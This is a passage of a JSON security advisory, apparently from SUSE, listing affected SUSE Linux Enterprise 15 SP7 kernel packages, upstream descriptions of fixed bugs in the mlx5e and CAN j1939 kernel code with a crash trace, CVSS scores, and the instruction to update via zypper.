"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
